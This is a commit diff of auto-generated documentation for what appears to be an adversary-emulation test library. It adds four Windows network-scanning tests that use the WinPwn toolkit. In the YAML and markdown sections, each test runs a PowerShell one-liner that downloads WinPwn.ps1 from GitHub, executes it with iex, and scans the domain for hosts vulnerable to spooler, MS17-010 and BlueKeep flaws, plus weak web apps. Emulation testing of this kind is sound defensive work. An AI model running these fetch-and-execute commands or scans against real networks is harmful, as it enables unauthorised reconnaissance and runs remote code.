Generated docs from job=generate-docs branch=master [ci skip]

2022-05-08 02:02:21 +00:00
parent 3022fe0666
commit f863bcc3ca
6 changed files with 193 additions and 0 deletions
@@ -910,6 +910,10 @@ discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257
 discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
 discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
 discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
 discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
@@ -634,6 +634,10 @@ discovery,T1069.001,Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-
 discovery,T1069.001,Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
 discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
 discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
 discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
 discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
@@ -1434,6 +1434,10 @@
  - Atomic Test #2: Port Scan Nmap [linux, macos]
  - Atomic Test #3: Port Scan NMap for Windows [windows]
  - Atomic Test #4: Port Scan using python [windows]
+  - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+  - Atomic Test #6: WinPwn - MS17-10 [windows]
+  - Atomic Test #7: WinPwn - bluekeep [windows]
+  - Atomic Test #8: WinPwn - fruit [windows]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
  - Atomic Test #1: Network Share Discovery [macos]
  - Atomic Test #2: Network Share Discovery - linux [linux]
@@ -1035,6 +1035,10 @@
 - [T1046 Network Service Scanning](../../T1046/T1046.md)
  - Atomic Test #3: Port Scan NMap for Windows [windows]
  - Atomic Test #4: Port Scan using python [windows]
+  - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+  - Atomic Test #6: WinPwn - MS17-10 [windows]
+  - Atomic Test #7: WinPwn - bluekeep [windows]
+  - Atomic Test #8: WinPwn - fruit [windows]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
  - Atomic Test #3: Network Share Discovery command prompt [windows]
  - Atomic Test #4: Network Share Discovery PowerShell [windows]
@@ -60280,6 +60280,55 @@ discovery:

          '
        name: powershell
+    - name: WinPwn - spoolvulnscan
+      auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
+      description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of
+        WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          spoolvulnscan -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - MS17-10
+      auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
+      description: Search for MS17-10 vulnerable Windows Servers in the domain using
+        powerSQL function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          MS17-10 -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - bluekeep
+      auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+      description: Search for bluekeep vulnerable Windows Systems in the domain using
+        bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds
+        in testing on a small domain).
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          bluekeep -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - fruit
+      auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
+      description: Search for potentially vulnerable web apps (low hanging fruits)
+        using fruit function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          fruit -noninteractive -consoleoutput
+        name: powershell
  T1135:
    technique:
      object_marking_refs:
@@ -14,6 +14,14 @@ Within cloud environments, adversaries may attempt to discover services running

 - [Atomic Test #4 - Port Scan using python](#atomic-test-4---port-scan-using-python)

+- [Atomic Test #5 - WinPwn - spoolvulnscan](#atomic-test-5---winpwn---spoolvulnscan)
+
+- [Atomic Test #6 - WinPwn - MS17-10](#atomic-test-6---winpwn---ms17-10)
+
+- [Atomic Test #7 - WinPwn - bluekeep](#atomic-test-7---winpwn---bluekeep)
+
+- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)
+

 <br/>

@@ -209,4 +217,124 @@ echo "Python 3 must be installed manually"



+<br/>
+<br/>
+
+## Atomic Test #5 - WinPwn - spoolvulnscan
+Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 54574908-f1de-4356-9021-8053dd57439a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+spoolvulnscan -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - MS17-10
+Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97585b04-5be2-40e9-8c31-82157b8af2d6
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+MS17-10 -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - WinPwn - bluekeep
+Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+bluekeep -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - WinPwn - fruit
+Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bb037826-cbe8-4a41-93ea-b94059d6bb98
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+fruit -noninteractive -consoleoutput
+```
+
+
+
+
+
+
 <br/>